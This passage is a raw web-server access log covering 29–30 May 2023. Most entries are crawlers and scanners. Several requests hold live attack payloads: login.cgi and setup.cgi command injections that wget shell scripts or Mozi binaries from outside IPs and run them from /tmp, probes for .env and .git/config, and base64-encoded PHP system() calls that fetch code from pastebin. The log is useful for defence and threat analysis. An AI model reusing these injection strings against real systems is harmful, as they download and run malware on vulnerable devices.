157.97.105.189 - - [29/May/2023:02:30:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 141.98.11.41 - - [29/May/2023:02:49:19 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 35.203.211.234 - - [29/May/2023:03:06:53 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 109.195.85.80 - - [29/May/2023:03:24:22 +0200] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36" 198.199.94.60 - - [29/May/2023:03:25:48 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-" 141.98.11.41 - - [29/May/2023:03:53:16 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 125.132.113.130 - - [29/May/2023:04:42:47 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 35.92.127.243 - - [29/May/2023:04:47:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" 179.43.177.244 - - [29/May/2023:05:21:43 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World" 183.136.225.44 - - [29/May/2023:05:48:43 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 183.136.225.44 - - [29/May/2023:05:48:45 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 167.248.133.125 - - [29/May/2023:06:01:08 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.248.133.125 - - [29/May/2023:06:01:08 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.125 - - [29/May/2023:06:01:08 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 167.248.133.125 - - [29/May/2023:06:01:08 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.125 - - [29/May/2023:06:01:08 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 172.104.11.51 - - [29/May/2023:06:17:11 +0200] "\x16\x03\x01" 400 383 "-" "-" 96.95.55.142 - - [29/May/2023:07:09:11 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 66.115.145.205 - - [29/May/2023:07:25:51 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:63.0) Gecko/20100101 Firefox/63.0" 179.43.177.244 - - [29/May/2023:07:40:47 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 167.248.133.38 - - [29/May/2023:07:57:58 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.248.133.38 - - [29/May/2023:07:57:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.38 - - [29/May/2023:07:57:59 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 167.248.133.38 - - [29/May/2023:07:57:59 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.38 - - [29/May/2023:07:57:59 +0200] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 59.55.194.104 - - [29/May/2023:08:03:47 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.55.194.104:36744/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 364 "-" "-" 54.151.195.122 - - [29/May/2023:08:28:27 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36'Bytespider;https://zhanzhang.toutiao.com/" 4.184.57.28 - - [29/May/2023:09:39:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Python/3.10 aiohttp/3.8.3" 198.235.24.115 - - [29/May/2023:10:22:10 +0200] "\x16\x03\x01" 400 383 "-" "-" 83.97.73.89 - - [29/May/2023:11:06:12 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 35.203.92.110 - - [29/May/2023:11:39:49 +0200] "\x16\x03\x01" 400 383 "-" "-" 35.203.92.110 - - [29/May/2023:11:39:51 +0200] "OPTIONS / HTTP/1.0" 200 423 "-" "-" 45.133.173.18 - - [29/May/2023:12:58:19 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:81.0) Gecko/20100101 Firefox/81.0" 74.50.94.120 - - [29/May/2023:13:07:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 126.77.206.93 - - [29/May/2023:13:12:29 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 216.218.206.68 - - [29/May/2023:13:13:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 216.218.206.68 - - [29/May/2023:13:15:54 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" 216.218.206.68 - - [29/May/2023:13:16:39 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 175.41.179.142 - - [29/May/2023:13:17:56 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36'Bytespider;https://zhanzhang.toutiao.com/" 80.66.88.204 - - [29/May/2023:13:26:47 +0200] "\x03" 400 383 "-" "-" 92.119.36.113 - - [29/May/2023:13:48:24 +0200] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 192.241.236.39 - - [29/May/2023:13:51:31 +0200] "GET /druid/index.html HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x" 35.187.98.121 - - [29/May/2023:13:55:39 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.28.2" 83.97.73.89 - - [29/May/2023:14:01:56 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 103.110.32.156 - - [29/May/2023:14:07:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 18.142.234.54 - - [29/May/2023:14:11:32 +0200] "GET /?page_id=316 HTTP/1.1" 200 274 "-" "'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36'Bytespider;https://zhanzhang.toutiao.com/" 109.205.213.38 - - [29/May/2023:14:19:17 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 178.128.152.119 - - [29/May/2023:14:30:44 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0" 31.171.154.73 - - [29/May/2023:14:39:11 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:62.0) Gecko/20100101 Firefox/62.0" 185.233.19.21 - - [29/May/2023:14:42:14 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 83.97.73.89 - - [29/May/2023:14:52:07 +0200] "GET /geoserver HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 71.6.232.22 - - [29/May/2023:15:24:49 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" 13.215.222.123 - - [29/May/2023:15:29:17 +0200] "GET /buecherliste/the-secret-das-geheimnis/ HTTP/1.1" 404 305 "-" "'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36'Bytespider;https://zhanzhang.toutiao.com/" 141.98.11.41 - - [29/May/2023:15:48:19 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 66.249.77.208 - - [29/May/2023:15:56:59 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.77.208 - - [29/May/2023:15:56:59 +0200] "GET /leistungen/ HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 18.140.22.110 - - [29/May/2023:16:00:20 +0200] "GET /robots.txt HTTP/1.1" 404 291 "-" "'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36'Bytespider;https://zhanzhang.toutiao.com/" 222.190.61.198 - - [29/May/2023:16:01:46 +0200] "\x16\x03\x03" 400 383 "-" "-" 222.190.61.198 - - [29/May/2023:16:01:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_181)" 222.190.61.198 - - [29/May/2023:16:02:05 +0200] "-" 408 - "-" "-" 191.248.76.6 - - [29/May/2023:16:33:49 +0200] "HEAD / HTTP/1.1" 200 - "-" "-" 191.248.76.6 - - [29/May/2023:16:33:50 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 191.248.76.6 - - [29/May/2023:16:33:53 +0200] "HEAD /invoker/EJBInvokerServlet HTTP/1.1" 404 - "-" "-" 109.237.97.180 - - [29/May/2023:17:28:04 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.97.180 - - [29/May/2023:17:28:04 +0200] "\x16\x03\x01\x01H\x01" 400 383 "-" "-" 51.159.164.227 - - [29/May/2023:17:56:15 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" 51.159.164.227 - - [29/May/2023:17:56:15 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" 109.205.213.108 - - [29/May/2023:18:37:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 37.194.116.176 - - [29/May/2023:18:59:11 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 141.98.11.41 - - [29/May/2023:19:00:50 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 109.205.213.4 - - [29/May/2023:19:12:26 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 59.28.239.121 - - [29/May/2023:19:19:28 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 80.94.92.68 - - [29/May/2023:19:35:42 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 80.94.92.68 - - [29/May/2023:19:35:44 +0200] "POST / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 198.199.118.220 - - [29/May/2023:20:01:42 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 109.205.213.39 - - [29/May/2023:20:12:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 109.205.213.14 - - [29/May/2023:20:19:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 185.153.180.170 - - [29/May/2023:20:20:01 +0200] "GET /recordings/theme/main.css HTTP/1.1" 404 370 "-" "curl/7.29.0" 18.138.173.42 - - [29/May/2023:20:22:52 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36'Bytespider;https://zhanzhang.toutiao.com/" 141.98.6.198 - - [29/May/2023:20:34:03 +0200] "GET /Makhdamx.php HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3" 141.98.6.198 - - [29/May/2023:20:34:03 +0200] "GET /wp-content/themes/welfare-charity/www.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3" 179.43.177.244 - - [29/May/2023:20:41:09 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World" 109.205.213.14 - - [29/May/2023:20:49:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 191.101.31.69 - - [29/May/2023:21:25:43 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:69.0) Gecko/20100101 Firefox/69.0" 152.32.135.231 - - [29/May/2023:21:36:55 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" 152.32.135.231 - - [29/May/2023:21:36:55 +0200] "GET /layout.php HTTP/1.1" 200 1674 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" 152.32.135.231 - - [29/May/2023:21:36:56 +0200] "GET /entry.php?id=10441&UIN= HTTP/1.1" 200 2866 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" 152.32.135.231 - - [29/May/2023:21:37:10 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" 144.137.212.146 - - [29/May/2023:21:40:50 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 125.132.113.130 - - [29/May/2023:21:43:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 161.35.157.58 - - [29/May/2023:21:54:17 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 46.51.218.124 - - [29/May/2023:22:26:58 +0200] "GET /?page_id=312 HTTP/1.1" 200 274 "-" "'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36'Bytespider;https://zhanzhang.toutiao.com/" 170.64.161.227 - - [29/May/2023:22:37:22 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 66.249.69.145 - - [29/May/2023:23:01:37 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.69.145 - - [29/May/2023:23:01:38 +0200] "GET /wp-content/uploads/2017/01/Infoblatt-Ssystembewegung-mit-Karl-und-Catrine-erstes-Halbjahr-2017.pdf HTTP/1.1" 404 352 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 126.77.206.93 - - [29/May/2023:23:14:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 47.88.87.97 - - [29/May/2023:23:43:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36" 47.89.193.239 - - [29/May/2023:23:43:02 +0200] "GET /Public/home/js/check.js HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36" 47.254.85.182 - - [29/May/2023:23:43:02 +0200] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36" 62.233.50.179 - - [29/May/2023:23:56:14 +0200] "\x03" 400 383 "-" "-" 66.249.69.145 - - [30/May/2023:00:01:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 45.128.232.62 - - [30/May/2023:00:30:08 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 20.237.33.87 - - [30/May/2023:00:31:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 20.237.33.87 - - [30/May/2023:00:31:12 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 66.249.69.143 - - [30/May/2023:00:31:35 +0200] "GET /wp-content/uploads/2017/01/Infoblatt-Ssystembewegung-mit-Karl-und-Catrine-erstes-Halbjahr-2017.pdf HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 103.133.214.139 - - [30/May/2023:00:41:35 +0200] "GET /wp-stream.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=<=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 300 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:41:43 +0200] "GET /wp-blog-post.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=<=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 302 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:41:54 +0200] "GET /wp-blockdown.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=<=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 303 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:42:01 +0200] "GET /wp-beckup.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=<=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 301 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:42:05 +0200] "GET //wp-blockup.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=<=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 302 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:42:16 +0200] "GET /.well-known/wp-blockup.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=<=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:42:20 +0200] "GET /wp-content/uploads/wp-blockup.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=<=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:42:30 +0200] "GET /wp-content/uploads/wp-stream.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=<=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:42:42 +0200] "GET /wp-admin/css/colors/blue/blue.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:42:45 +0200] "GET /slicemap.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 299 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:42:52 +0200] "GET /wp-admin/admin.php?3x=3x HTTP/1.1" 404 301 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:43:04 +0200] "GET /wp-content/uploads/wp-blockdown.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=<=503c138bd956ccbe9a63967ef1f22dac HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:43:18 +0200] "GET /wp-content/plugins/wp-sps/simple.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:43:27 +0200] "GET /assets/images/images.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs= HTTP/1.1" 404 303 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 103.133.214.139 - - [30/May/2023:00:43:36 +0200] "GET 